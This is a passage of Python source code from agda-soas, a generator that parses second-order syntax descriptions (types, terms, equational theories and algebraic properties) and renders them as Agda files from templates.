ops (dict[str, str]): Mapping of operator names to symbols
Returns:
Term: Parsed term
"""
s = strip_parens(s.strip())
if re.search("^\w*$",s): # If a single word, either a variable or a constant
if s in ops:
return Con(ops[s], [], ctx, mctx)
elif s in ctx:
return Var(s, ctx, mctx)
elif s in mctx:
return MVar(s, [], ctx, mctx)
elif s.startswith("O") and s[1:] in mctx:
return MVar(s, [], ctx, mctx, is_hole=True)
else:
raise Exception("Unbound variable: " + "'" + s + "'")
elif re.search("^\w*\[.*\]$", s): # If a metavariable
m = re.search("^(\w)*\[(.*)\]$", s)
mvar = m.group(1)
env = m.group(2)
if not env:
return MVar(mvar, [], ctx, mctx, is_hole=mvar.startswith("O"))
else:
return MVar(mvar, [Term.parse_term(t, ctx, mctx, ops) for t in split_tuple(env)], ctx, mctx)
elif re.search("^([\w ]*)\.(.*)$", s): # If a variable under binders
m = re.search("^([\w ]*)\.(.*)$", s)
bound = m.group(1).split()
tm = m.group(2)
return Term.parse_term(tm, bound + ctx, mctx, ops)
elif re.search("^(\w*) *\((.*)\)$", s): # If an expression
m = re.search("^(\w*) *\((.*)\)$", s)
op = m.group(1)
args = m.group(2)
return Con(ops[op], [Term.parse_term(t, ctx, mctx, ops) for t in split_tuple(args)], ctx, mctx)
else:
raise Exception("Can't parse: " + s)
def __repr__(self):
return str(vars(self))
class Var(Term):
"""Variables are terms with a de Bruijn index.
"""
def __init__(self, var, ctx, mctx):
super().__init__(ctx, mctx)
self.db = ctx.index(var)
def apply_ren(self, ren_dict):
pass
def apply_ren_sym(self, ren_dict):
pass
def render(self):
return "x" + num_to_ix(self.db)
class MVar(Term):
"""Metavariables are terms with a metavariable de Bruijn index and a term environment.
"""
def __init__(self, mvar, env, ctx, mctx, is_hole=False):
super().__init__(ctx, mctx)
self.mvar = mvar
self.mdb = mctx.index(mvar.replace("O", ""))
self.env = env
self.is_hole = is_hole # If the metavariable intends to denote a hole in a congruence context.
def apply_ren(self, ren_dict):
for t in self.env:
t.apply_ren(ren_dict)
def apply_ren_sym(self, ren_dict):
for t in self.env:
t.apply_ren_sym(ren_dict)
def render(self):
mvs = "◌" + num_to_uix(self.mdb) if self.is_hole else num_to_frak(self.mdb)
return mvs + \
(f"⟨ {' ◂ '.join([wrap(t.render(), sep='⟨ ') for t in self.env])} ⟩"
if self.env else "")
class Con(Term):
"""A constructor is a term with a name and list of argument terms.
"""
def __init__(self, name, args, ctx, mctx):
super().__init__(ctx, mctx)
self.name = name
self.args = args
def apply_ren(self, ren_dict):
if self.name in ren_dict: self.name = ren_dict[self.name]
for ar in self.args:
ar.apply_ren(ren_dict)
def apply_ren_sym(self, ren_dict):
self.name = apply_replacements(self.name, ren_dict)
for ar in self.args:
ar.apply_ren_sym(ren_dict)
def render(self):
if self.args:
if "_" in self.name:
return fill_underscores(self.name, [t.render() if isinstance(t, MVar) else wrap(t.render()) for t in self.args])
else:
return self.name + " " + " ".join([wrap(t.render()) for t in self.args])
else: return self.name
class Eq:
"""Equation between two second-order terms.
"""
def __init__(self, name, mctx_s, ctx_s, tm1, tm2, ops, derived=False, raw_str=""):
self.name = name
mctx, self.mctx_tys = Eq.unzip_ctx(mctx_s)
self.mctx_tys = [Op.parse_so_type(t) for t in self.mctx_tys]
ctx, self.ctx_tys = Eq.unzip_ctx(ctx_s)
self.tm1 = Term.parse_term(tm1, ctx, mctx, ops)
self.tm2 = Term.parse_term(tm2, ctx, mctx, ops)
self.derived = derived
self.derived_def = ""
self.raw_str = raw_str
def __eq__(self, o: object) -> bool:
return self.name == o.name
def __hash__(self) -> int:
return hash(self.name)
def unzip_ctx(s):
"""Turn a [var : type] context into a list of variable names and types.
Args:
s (str): A string of double space-separated var : type pair list.
Returns:
(list[str], list[str]): The list of variable names and their types.
"""
ctx = split_spaces(s)
vs = []
ts = []
for v, *t in [(splitstrip(v, ":")) for v in ctx]:
t = t[0] if t else "*"
if " " in v:
ws = v.split()
vs += ws
ts += [t] * len(ws)
else:
vs.append(v)
ts.append(t)
return (vs, ts)
def render_ctx(ctx, sep="∙"):
if not ctx:
return "∅"
else:
return "⌊ " + f" {sep} ".join([wrap(t) for t in ctx]) + " ⌋"
def render_comps(self):
"""Render components of an equality judgment: equality name,
metavariable context, object variable context, and the two terms.
"""
mctx_str = ""
if not self.mctx_tys:
mctx_str = "⁅⁆"
else:
mctx_str = " ⁆ ⁅ ".join([f"{Eq.render_ctx(bound, '·')[2:-2]} ⊩ {ty}" if bound else ty for bound, ty in self.mctx_tys])
mctx_str = "⁅ " + mctx_str + " ⁆̣"
return(self.name, mctx_str, Eq.render_ctx(self.ctx_tys), self.tm1.render(), self.tm2.render())
def render_padded(comps, pn, pm, pc, pt, eq_sign="≋ₐ"):
"""Render components with padding.
Args:
comps (list[(str, list[str], list[str], Term, Term)]): A list of equality components
pn (int): Name padding
pm (int): Metavariable context padding
pc (int): Object variable context padding
pt (int): Term padding
eq_sign (str, optional): Equality sign to use between terms. Defaults to "≋ₐ".
Returns:
str: String representation of the equation.
"""
n, m, c, t1, t2 = comps
return f"{rpad(n, pn)} : {rpad(m, pm if '⁅⁆' not in m else pm-1)} ▹ {cpad(c, pc)} ⊢ {lpad(t1, pt)} {eq_sign} {t2}"
def render(self, eq_sign="≋ₐ"):
"""Render equality without padding.
Args:
eq_sign (str, optional): Equality sign to use between terms. Defaults to "≋ₐ".
Returns:
str: String representation of the equality.
"""
n, m, c, t1, t2 = self.render_comps()
return Eq.render_padded((n, m, c, t1, t2), len(n), len(m), len(c), len(t1), eq_sign)
def parse_equations(eqs, ops):
"""Parse list of equation strings.
Args:
eqs (list[string]): List of equation strings.
ops (dict[str, str]): Mapping of operator names to symbols.
Returns:
(list[str], list[AlgProp]): The list of custom equations, and the list of algebraic properties.
"""
eeqs = []
prop_list = ['unit of', 'commutative', 'associative', 'distributes over', 'inverse of',
'annihilates', 'idempotent', 'absorbs', 'absorptive', 'involutive']
props = []
for eq in eqs:
if not any_in(prop_list, eq):
eeqs.append(Eq.parse_eq(eq, ops))
else:
if 'unit of' in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*unit of\s+'(\w+)'$", eq)
unit, side, op = m.groups()
props.append(Unit(unit, op, side))
elif "annihilates" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*annihilates\s+'(\w+)'$", eq)
unit, side, op = m.groups()
props.append(Annih(unit, op, side))
elif "distributes over" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*distributes over\s+'(\w+)'$", eq)
op1, side, op2 = m.groups()
props.append(Dist(op1, op2, side))
elif "absorbs" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*absorbs\s+'(\w+)'$", eq)
op1, side, op2 = m.groups()
props.append(Absorb(op1, op2, side))
elif "inverse of" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*inverse of\s+'(\w+)'\s+with\s+'(\w+)'$", eq)
uop, side, op, unit = m.groups()
props.append(Inverse(uop, op, unit, side))
elif "absorptive" in eq:
m = re.search("^'(\w+)'\s+and\s+'(\w+)'\s+absorptive$", eq)
op1, op2 = m.groups()
props.append(Absorb(op1, op2, None))
props.append(Absorb(op2, op1, None))
else:
m = re.search("^'(\w+)'\s+(.*)$", eq)
op = m.group(1)
kws = splitstrip(m.group(2), ",")
if 'associative' in kws:
props.append(Assoc(op))
if 'commutative' in kws:
props.append(Comm(op))
if 'idempotent' in kws:
props.append(Idemp(op))
if 'involutive' in kws:
props.append(Invol(op))
return eeqs, props
def prop_to_eq(prop, all_props, ops):
"""Convert property to equation, marking it as 'derivable' if it
is directed and the top-level operator is commutative.
Args:
prop (AlgProp): Algebraic property
all_props (list[AlgProp]): List of existing algebraic properties
ops (dict[str, str]): Mapping of operator names to symbols.
Returns:
Eq: Equation based on the property, optionally derivable.
"""
if isinstance(prop, DirAlgProp) and Comm(prop.op) in all_props:
prop.side = Side.BOTH
prop.derived = True
return prop.eq(ops)
else:
return prop.eq(ops)
def parse_prop(s):
"""Parse algebraic property.
Args:
s (str): String representation of algebraic property
Returns:
AlgProp: Appropriate algebraic property.
"""
props = []
if 'unit of' in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*unit of\s+'(\w+)'$", s)
unit, side, op = m.groups()
props.append(Unit(unit, op, side))
elif "annihilates" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*annihilates\s+'(\w+)'$", s)
unit, side, op = m.groups()
props.append(Annih(unit, op, side))
elif "distributes over" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*distributes over\s+'(\w+)'$", s)
op1, side, op2 = m.groups()
props.append(Dist(op1, op2, side))
elif "absorbs" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*absorbs\s+'(\w+)'$", s)
op1, side, op2 = m.groups()
props.append(Absorb(op1, op2, side))
elif "inverse of" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*inverse of\s+'(\w+)'\s+with\s+'(\w+)'$", s)
uop, side, op, unit = m.groups()
props.append(Inverse(uop, op, unit, side))
elif "absorptive" in s:
m = re.search("^'(\w+)'\s+and\s+'(\w+)'\s+absorptive$", s)
op1, op2 = m.groups()
props.append(Absorb(op1, op2, None))
props.append(Absorb(op2, op1, None))
else:
m = re.search("^'(\w+)'\s+(.*)$", s)
op = m.group(1)
kws = splitstrip(m.group(2), ",")
if 'associative' in kws:
props.append(Assoc(op))
if 'commutative' in kws:
props.append(Comm(op))
if 'idempotent' in kws:
props.append(Idemp(op))
if 'involutive' in kws:
props.append(Invol(op))
return props
def parse_eq(s, ops):
"""Parse equation.
Args:
s (str): String representation of an equation
ops (dict[str, str]): Mapping of operator names to symbols
Returns:
Eq: Parsed equation
"""
derived = False
if s[0] == "{" and s[-1] == "}": # If surrounded by {...}, equation is derived
derived = True
s = s[1:-1]
if "|-" in s:
m = re.search("^\(([^ )]+)\)([^|]*)\|>([^|]*)\|-([^=]*)=([^=]*)$", s)
if not m: raise Exception("Syntax error: " + s)
name, mctx_s, ctx_s, tm1, tm2 = [m.group(n).strip() for n in range(1,6)]
else: # Object variable context is optional
m = re.search("^\(([^ )]+)\)([^|]*)\|>([^=]*)=([^=]*)$", s)
if not m: raise Exception("Syntax error: " + s)
name, mctx_s, tm1, tm2 = [m.group(n).strip() for n in range(1,5)]
ctx_s = ""
return Eq(name, mctx_s, ctx_s, tm1, tm2, ops, derived, s)
def __str__(self):
return self.raw_str
def __repr__(self):
return str(vars(self))
class Theory:
"""Equational theory of a second-order syntax, consisting of equations and algebraic properties.
"""
def __init__(self, props, new_eqs, ops):
self.props = props
self.new_eqs = new_eqs
self.ops = ops
@property
def all_eqs(self):
return list(dict.fromkeys(flatten([Eq.prop_to_eq(p, self.props,self.ops) for p in self.props]) + self.new_eqs))
@property
def eqs(self):
return [eq for eq in self.all_eqs if not eq.derived]
@property
def derived_eqs(self):
return [eq for eq in self.all_eqs if eq.derived]
@staticmethod
def mk(prop_lines, eq_lines, ops):
"""Construct theory from string descriptions of properties and equations.
Args:
prop_lines (list[str]): Algebraic properties as strings
eq_lines (list[str]): Equations as strings
ops (dict[str, str]): Mapping of operator names to symbols
Returns:
Theory: Theory with properties and equations.
"""
props = flatten([Eq.parse_prop(pl) for pl in prop_lines])
eqs = [Eq.parse_eq(el, ops) for el in eq_lines]
return Theory(props, eqs, ops)
def render_axioms(self):
"""Render equational axioms with padding
Returns:
list[str]: Rendered equations
"""
mn, mm, mc, mt = 0, 0, 0, 0
comps = [eq.render_comps() for eq in self.eqs]
for n, m, c, t1, _ in comps:
if mn < len(n): mn = len(n)
if mm < len(m): mm = len(m)
if mc < len(c): mc = len(c)
if mt < len(t1): mt = len(t1)
return [Eq.render_padded(cs, mn, mm, mc, mt) for cs in comps]
class AlgProp:
"""Base class for equational properties.
"""
def __eq__(self, o: object) -> bool:
if isinstance(o, self.__class__):
return self.__dict__ == o.__dict__
else:
return NotImplemented
def __repr__(self) -> str:
return str((self.__class__.__name__)) + " " + str(vars(self))
def __hash__(self) -> int:
return hash(tuple(sorted(self.__dict__.items())))
class Comm(AlgProp):
"""Commutativity"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}C) a b |> {self.op}(a, b) = {self.op}(b, a)", ops)]
class Assoc(AlgProp):
"""Associativity"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}A) a b c |> {self.op} ({self.op}(a, b), c) = {self.op} (a, {self.op}(b, c))", ops)]
class Idemp(AlgProp):
"""Idempotence"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}I) a |> {self.op}(a, a) = a", ops)]
class Invol(AlgProp):
"""Involution"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}²) a |> {self.op}({self.op} (a)) = a", ops)]
class Side(Enum):
"""Orientation of directed properties (e.g. left unit, right distributivity).
"""
LEFT = 1
RIGHT = 2
BOTH = 3
class DirAlgProp(AlgProp):
"""Directed algebraic property with a top-level binary operation and an orientation.
"""
def __init__(self, op, side) -> None:
super().__init__()
self.op = op
self.side = Side.BOTH if not side else (Side.LEFT if 'left' in side else Side.RIGHT)
self.derived = False
def eqs_and_deriv(self, _):
"""Left and right equations, and derived definition.
"""
pass
def eq(self, ops):
"""A directed property may give rise to two equations,
with the right one potentially derivable from the left one."""
left, right, deriv = self.eqs_and_deriv(ops)
eqs = []
if self.side in [Side.LEFT, Side.BOTH]:
eqs.append(Eq.parse_eq(left, ops))
# Add the right-side equation with its derivation
if self.side in [Side.RIGHT, Side.BOTH]:
eq = Eq.parse_eq(right, ops)
eq.derived_def = deriv
eq.derived = self.derived
eqs.append(eq)
return eqs
class Unit(DirAlgProp):
"""Unit"""
def __init__(self, unit, op, side) -> None:
super().__init__(op, side)
self.unit = unit
def eqs_and_deriv(self, ops):
op_sym = ops[self.op].strip('_')
return (
f"({ops[self.unit]}U{op_sym}ᴸ) a |> {self.op} ({self.unit}, a) = a",
f"({ops[self.unit]}U{op_sym}ᴿ) a |> {self.op} (a, {self.unit}) = a",
f"{ops[self.unit]}U{op_sym}ᴿ = tr (ax {op_sym}C with《 𝔞 ◃ {ops[self.unit]} 》) (ax {ops[self.unit]}U{op_sym}ᴸ with《 𝔞 》)")
class Annih(DirAlgProp):
"""Annihilation"""
def __init__(self, unit, op, side) -> None:
super().__init__(op, side)
self.unit = unit
def eqs_and_deriv(self, ops):
op_sym = ops[self.op].strip('_')
return (
f"({ops[self.unit]}X{op_sym}ᴸ) a |> {self.op} ({self.unit}, a) = {self.unit}",
f"({ops[self.unit]}X{op_sym}ᴿ) a |> {self.op} (a, {self.unit}) = {self.unit}",
f"{ops[self.unit]}X{op_sym}ᴿ = tr (ax {op_sym}C with《 𝔞 ◃ {ops[self.unit]} 》) (ax {ops[self.unit]}X{op_sym}ᴸ with《 𝔞 》)")
class Absorb(DirAlgProp):
"""Absorption"""
def __init__(self, op, op2, side) -> None:
super().__init__(op, side)
self.op2 = op2
def eqs_and_deriv(self, ops):
op1_sym = ops[self.op].strip('_')
op2_sym = ops[self.op2].strip('_')
return (
f"({op1_sym}B{op2_sym}ᴸ) a b |> {self.op} ({self.op2} (a, b), a) = a",
f"({op1_sym}B{op2_sym}ᴿ) a b |> {self.op} (a, {self.op2} (a, b)) = a",
f"{op1_sym}B{op2_sym}ᴿ = tr (ax {op1_sym}C with《 𝔞 ◃ ({Term.parse_term(f'{self.op2} (a, b)', [], ['a','b'],ops).render()}) 》) (ax {op1_sym}B{op2_sym}ᴸ with《 𝔞 ◃ 𝔟 》)")
class Inverse(DirAlgProp):
"""Inverse"""
def __init__(self, uop, bop, unit, side) -> None:
super().__init__(bop, side)
self.uop = uop
self.unit = unit
def eqs_and_deriv(self, ops):
uop_sym = ops[self.uop].strip('_')
bop_sym = ops[self.op].strip('_')
return (
f"({uop_sym}N{bop_sym}ᴸ) a |> {self.op} ({self.uop} (a), a) = {self.unit}",
f"({uop_sym}N{bop_sym}ᴿ) a |> {self.op} (a, {self.uop} (a)) = {self.unit}",
f"{uop_sym}N{bop_sym}ᴿ = tr (ax {bop_sym}C with《 𝔞 ◃ ({Term.parse_term(f'{self.uop} (a)', [], ['a'],ops).render()}) 》) (ax {uop_sym}N{bop_sym}ᴸ with《 𝔞 》)")
class Dist(DirAlgProp):
"""Distributivity"""
def __init__(self, op, op2, side) -> None:
super().__init__(op, side)
self.op2 = op2
def eqs_and_deriv(self, ops):
op1_sym = ops[self.op].strip('_')
op2_sym = ops[self.op2].strip('_')
symb = lambda s: Term.parse_term(s, [], ['a','b','c','d','e'], ops).render()
return (
f"({op1_sym}D{op2_sym}ᴸ) a b c |> {self.op} (a, {self.op2} (b, c)) = {self.op2} ({self.op}(a, b), {self.op}(a, c))",
f"({op1_sym}D{op2_sym}ᴿ) a b c |> {self.op} ({self.op2} (a, b), c) = {self.op2} ({self.op}(a, c), {self.op}(b, c))",
(f"{op1_sym}D{op2_sym}ᴿ = begin\n "
f"{symb(f'{self.op} ({self.op2} (a, b), c)')} ≋⟨ ax {op1_sym}C with《 {symb(f'{self.op2} (a, b)')} ◃ 𝔠 》 ⟩\n "
f"{symb(f'{self.op} (c, {self.op2} (a, b))')} ≋⟨ ax {op1_sym}D{op2_sym}ᴸ with《 𝔠 ◃ 𝔞 ◃ 𝔟 》 ⟩\n "
f"{symb(f'{self.op2} ({self.op}(c, a),{self.op}(c,b))')} ≋⟨ cong₂[ ax {op1_sym}C with《 𝔠 ◃ 𝔞 》 ][ ax {op1_sym}C with《 𝔠 ◃ 𝔟 》 ]inside {symb(f'{self.op2} (Od, Oe)')} ⟩\n "
f"{symb(f'{self.op2} ({self.op}(a, c),{self.op}(b,c))')} ∎"))
```
#### File: agda-soas/gen/type.py
```python
class TyOp:
"""Type operator of a sype signature.
"""
def __init__(self, name, arity, infix=None, derived=False):
"""Initialise type operator
Args:
name (str): Name of a operator (can be symbol with underscores)
arity (number): Arity of the operator
infix (str, optional): str describing the associativity and fixity of the operator. Defaults to None.
"""
self.name = name
self.arity = arity
self.padding = 0 # Padding required based on the longest type operator name
self.derived = derived
self.infix = None
if infix:
if infix[0] in ['l', 'r']:
self.infix = (infix[0], infix[1:])
else: self.infix = ('', infix)
def __eq__(self, o: object) -> bool:
return self.name == o.name
def __hash__(self) -> int:
return hash(self.name)
def spec(self):
"""Specification of a type operator
Returns:
dict: Dictionary representing the type operator
"""
spec = {'TyOpName': self.name, 'TyOpAr': self.arity}
if self.infix:
spec['TyFixity'] = self.infix
return spec
def __repr__(self):
return str(self.spec())
def __str__(self):
return f"{self.name}{' ' * self.padding} : {self.arity}-ary" + (f" | {self.infix[0]}{self.infix[1]}" if self.infix else "")
class TypeSignature:
"""Simple type signature of a second-order syntax
"""
def __init__(self, name, *ops: list[TyOp]):
"""Initialise type signature with type name and list of type operator lists.
Args:
name (str): Name of the type signature
*ops (list[TyOp]): List of type operators
"""
self.name = name
self.all_ops = list(ops)
@property
def symbols(self):
symbols = set()
max_op_len = max([len(tc.name) for tc in self.all_ops])
for op in self.all_ops:
symbols = symbols.union(set(op.name.split('_')))
op.padding = max_op_len - len(op.name)
symbols.discard("")
return symbols
@property
def ops(self):
return [op for op in self.all_ops if not op.derived]
@property
def derived_ty_ops(self):
return [op for op in self.all_ops if op.derived]
def render_ty_decl(self):
"""Render constructors of type declaration.
Returns:
list[str]: List of constructors for the type declaration
"""
ls = []
ls += [f"{op.name}{' ' * op.padding} : {(self.name + ' → ')*op.arity + self.name}"
for op in self.ops]
return ls
def render_fixity(self):
"""Render fixity information for type operators.
Returns:
list[str]: Fixity declarations for the operators
"""
ls = []
for op in self.ops:
if op.infix:
assoc, infix = op.infix
ls.append(f"infix{assoc} {infix} {op.name}")
return ls
def render_all(self):
if isinstance(self, Unsorted):
return "open import SOAS.Common"
ls = f"-- Type declaration\ndata {self.name} : Set where\n "
return ls + "\n ".join(self.render_ty_decl()) + "\n" + "\n".join(self.render_fixity())
def spec(self):
"""Specification of a type signature.
Returns:
dict: Dictionary representing the type signature
"""
return {'TyName' : self.name,
'TyOps' : [tc.spec() for tc in self.ops ] }
def __repr__(self):
return str(self.spec())
def __str__(self):
ls = [f"type"]
ls += [' ' + str(tc) for tc in self.ops]
return '\n'.join(ls)
# Special case of an unsorted type signature: type name '*T' and a single nullary type constructor
class Unsorted(TypeSignature):
def __init__(self):
return super().__init__("*T", TyOp('*', 0))
```
#### File: JoeyEremondi/agda-soas/soas.py
```python
import argparse
from string import Template
import os
from os import path
from pathlib import Path, PurePath
from collections import OrderedDict
from typing import Type
from gen.type import *
from gen.term import *
from gen.eq import *
class Syntax:
"""Second-order syntax, consisting of a first-order type signature,
second-order term signature and second-order equational theory.
"""
def __init__(self, syn_name, ty_sig, tm_sig, theory):
self.syn_name = syn_name
self.ty_sig = ty_sig
self.tm_sig = tm_sig
self.theory = theory
self.tm_sig.extract_type_vars(ty_sig.symbols)
self.tm_sig.all_ty_vars()
self.tm_sig.ty_name = ty_sig.name
def render_agda(self, out):
"""Render the Agda files for the signature.
"""
if not out:
out = Path("out")
temp_strings = {
'syn_name': self.syn_name,
'type': self.ty_sig.name,
'type_fixity': '\n' + '\n'.join(self.ty_sig.render_fixity()) + '\n',
'type_decl': self.ty_sig.render_all(),
'derived_ty_ops': "\n".join(["\n-- Derived types"] + [f"{op.name} : {(self.ty_sig.name + ' → ')*op.arity + self.ty_sig.name}\n{op.name} = ?" for op in self.ty_sig.derived_ty_ops]) if self.ty_sig.derived_ty_ops else "",
'ty_vars': ' '.join(self.tm_sig.ty_vars),
'fst_ty_var': self.tm_sig.ty_vars[0],
'operator_decl': '\n '.join(self.tm_sig.render_op_symbols()),
'sig_string' : str(self),
'sig': self.tm_sig.name,
'sig_decl': '\n ; '.join(self.tm_sig.render_tm_sig()),
'syn_constructors': '\n '.join([op.render_op_ctor(self.tm_sig.name) for op in self.tm_sig.ops]),
'op_fixity': '\n '.join(self.tm_sig.render_op_fixity()),
'alg_patterns': "\n ".join([op.render_alg_pat() for op in self.tm_sig.ops]) if self.tm_sig.ops else "()",
'sem_patterns': "\n ".join([op.render_sem_pat() for op in self.tm_sig.ops]),
'alg_hom_patterns': "\n ".join([op.render_alg_hom_pat() for op in self.tm_sig.ops]) if self.tm_sig.ops else "⟨𝑎𝑙𝑔⟩ ()",
'alg_unique_patterns': "\n ".join([op.render_alg_unique_pat() for op in self.tm_sig.ops]),
'derived_tm_ops': "\n".join(["-- Derived operations"] + [f"{op.render_op_ctor(self.tm_sig.name + ' 𝔛')}\n{op.sym} = ?" for op in self.tm_sig.derived_tm_ops]) if self.tm_sig.derived_tm_ops else "",
'axioms': "\n ".join(self.theory.render_axioms()) if self.theory.eqs else "",
'derived_eqs': "\n".join(['-- Derived equations'] + [f"{eq.render(eq_sign='≋')}\n{eq.derived_def or eq.name + ' = ?'}" for eq in self.theory.derived_eqs] if self.theory.derived_eqs else "")
}
result = ""
if not path.exists(path.join(out, self.syn_name)):
os.makedirs(path.join(out, self.syn_name))
for tf in os.listdir(path.join('gen','templates')):
if not self.theory and tf == "Equality.agda":
continue
with open(path.join('gen','templates',tf), 'r') as f:
src = Template(f.read())
result = src.substitute(temp_strings)
with open(path.join(out, self.syn_name, tf), "w") as output:
output.write(result)
def derive_tokens(self, tokens):
"""Mark operations or equations as derived.
"""
for op in self.ty_sig.all_ops:
if op.name in tokens: op.derived = True
for op in self.tm_sig.all_ops:
if op.name in tokens or op.sym in tokens: op.derived = True
for eq in self.theory.all_eqs:
if eq.name in tokens: eq.derived = True
def hide_tokens(self, tokens):
"""Delete tokens (types, terms, equations) from the syntax.
"""
self.ty_sig.all_ops = [op for op in self.ty_sig.all_ops if op.name not in tokens and op.name != "*"]
self.tm_sig.all_ops = [op for op in self.tm_sig.all_ops if op.name not in tokens and op.sym not in tokens]
self.theory.all_eqs = [eq for eq in self.theory.all_eqs if eq.name not in tokens]
def keep_tokens(self, tokens):
"""Keep specified tokens (types, terms, equations) from the syntax.
"""
self.ty_sig.all_ops = [op for op in self.ty_sig.all_ops if op.name in tokens or op.name == "*"]
self.tm_sig.all_ops = [op for op in self.tm_sig.all_ops if op.name in tokens or op.sym in tokens]
self.theory.all_eqs = [eq for eq in self.theory.all_eqs if eq.name in tokens]
def rename_tokens(self, ren_dict):
"""Change full token names.
Args:
ren_dict (dict[str, str]): Mapping from old names to new.
"""
for tm_op in self.tm_sig.all_ops:
if tm_op.name in ren_dict: tm_op.name = ren_dict[tm_op.name]
if tm_op.sym in ren_dict: tm_op.sym = ren_dict[tm_op.sym]
for eq in self.theory.all_eqs:
if eq.name in ren_dict: eq.name = ren_dict[eq.name]
eq.raw_str = apply_replacements(eq.raw_str, ren_dict)
eq.tm1.apply_ren(ren_dict)
eq.tm2.apply_ren(ren_dict)
for prop in self.theory.props:
for k, v in prop.__dict__.items():
if v in ren_dict: prop.__dict__[k] = ren_dict[v]
new_ops = {}
for o, s in self.theory.ops.items():
new_ops[ren_dict[o] if o in ren_dict else o] = ren_dict[s] if s in ren_dict else s
self.theory.ops = new_ops
def rename_sym_in_tokens(self, ren_dict):
"""Change occurrences of symbols in tokens.
Args:
ren_dict (dict[str, str]): Mapping from old symbols to new.
"""
for tm_op in self.tm_sig.all_ops:
tm_op.name = apply_replacements(tm_op.name, ren_dict)
tm_op.sym = apply_replacements(tm_op.sym, ren_dict)
for eq in self.theory.all_eqs:
eq.name = apply_replacements(eq.name, ren_dict)
eq.raw_str = apply_replacements(eq.raw_str, ren_dict)
eq.tm1.apply_ren_sym(ren_dict)
eq.tm2.apply_ren_sym(ren_dict)
for prop in self.theory.props:
for k, v in prop.__dict__.items():
if v in ren_dict: prop.__dict__[k] = apply_replacements(prop.__dict__[k], ren_dict)
new_ops = {}
for o, s in self.theory.ops.items():
new_k = apply_replacements(o, ren_dict)
new_v = apply_replacements(s, ren_dict)
new_ops[new_k] = new_v
self.theory.ops = new_ops
def change_fixity(self, fix_dict):
for tm_op in self.tm_sig.all_ops:
if tm_op.name in fix_dict:
tm_op.infix_spec = fix_dict[tm_op.name]
def spec(self):
return {'TypeSignature' : self.ty_sig.spec(), 'TermSignature': self.tm_sig.spec()}
def __repr__(self):
return str(self.spec())
def __str__(self):
return (f"syntax {self.syn_name + (' | ' + self.tm_sig.name if self.tm_sig.name != self.syn_name else '')}\n\n{str(self.ty_sig)}\n\n{str(self.tm_sig)}\n\ntheory\n " + "\n ".join([str(eq) for eq in self.theory.all_eqs]))
def combine_syntaxes(syn1: Syntax, syn2: Syntax, syn_name="", tm_name=""):
"""Combine two syntaxes into one.
Args:
syn1 (Syntax): Base syntax
syn2 (Syntax): Extension syntax
syn_name (str, optional): Override syntax name. Defaults to "".
tm_name (str, optional): Override term signature name. Defaults to "".
Returns:
Syntax: Combined syntax
"""
override = syn2.tm_sig.name != syn2.syn_name
if isinstance(syn2.ty_sig, Unsorted): # Handle unsorted type signatures separately
if not syn1.ty_sig.ops or not syn2.ty_sig.ops:
com_ty_sig = Unsorted()
else:
com_ty_sig = syn1.ty_sig
else:
com_ty_sig = TypeSignature(syn2.ty_sig.name if override else syn1.ty_sig.name, *OrderedDict.fromkeys(syn1.ty_sig.all_ops + syn2.ty_sig.all_ops))
com_tm_sig = TermSignature(syn2.tm_sig.name if override else syn1.tm_sig.name, *OrderedDict.fromkeys((syn1.tm_sig.all_ops + syn2.tm_sig.all_ops)))
if tm_name:
if not isinstance(com_ty_sig, Unsorted):
com_ty_sig.name = tm_name + "T"
com_tm_sig.name = tm_name
com_thr = Theory(list_union(syn1.theory.props, syn2.theory.props), list_union(syn1.theory.new_eqs, syn2.theory.new_eqs), com_tm_sig.op_sym_dict)
return Syntax(
syn_name or syn2.syn_name,
com_ty_sig, com_tm_sig,
com_thr)
def combine_syntax_list(syns: list[Syntax]):
"""Combine a list of syntax descriptions"""
if len(syns) == 1:
return syns[0]
return combine_syntaxes(combine_syntax_list(syns[:-1]), syns[-1])
def op(op_desc, sym=None, infix=None, derived=False):
"""Parse operator description."""
name, *ty = op_desc.split(":")
*arg_tys, ret_ty = splitstrip(ty[0], "->")
return Op(
name.strip(),
*split_spaces(arg_tys[0]) if arg_tys else [],
sort=ret_ty.strip(),
sym=sym,
infix=infix,
derived=derived)
def parse_mods(mods):
"""Parse import modifiers: hiding, using, renaming."""
mods = splitstrip(mods, ";")
mod_dict = {m.split()[0] : splitstrip(m[len(m.split()[0]):], ",") for m in mods}
if 'renaming' in mod_dict:
mod_dict['renaming_sym'] = dict([(splitstrip(s[6:], "to")) for s in mod_dict['renaming'] if "symbol" in s])
ren_dict = dict([(splitstrip(s, "to")) for s in mod_dict['renaming'] if "symbol" not in s])
mod_dict['renaming'] = ren_dict.copy()
for k, v in ren_dict.items():
# Handle parallel name:symbol renames
if ":" in k and ":" in v:
kw, ks = splitstrip(k, ":")
vw, *vs = splitstrip(v, ":")
mod_dict['renaming'][kw] = vw
mod_dict['renaming_sym'][ks] = vs[0]
# Fixity redeclaration
if len(vs) == 2:
if 'fixity' in mod_dict:
mod_dict['fixity'][kw] = vs[1]
else:
mod_dict['fixity'] = {kw : vs[1]}
else:
mod_dict['renaming'][k] = v
if 'using' in mod_dict:
mod_dict['using'] = mod_dict['using'] + list(mod_dict['renaming'].keys())
if 'hiding' in mod_dict:
mod_dict['hiding'] = [t for t in mod_dict['hiding'] if t not in mod_dict['renaming'].keys()]
return mod_dict
def read_syn(file):
"""Read syntax file.
Args:
file (str): File path containing syntax description.
Raises:
Exception: [description]
Returns:
Syntax: Syntax extracted from the file.
"""
ls = []
path = Path(file)
dirname = path.parent
with open(file, 'r') as fp:
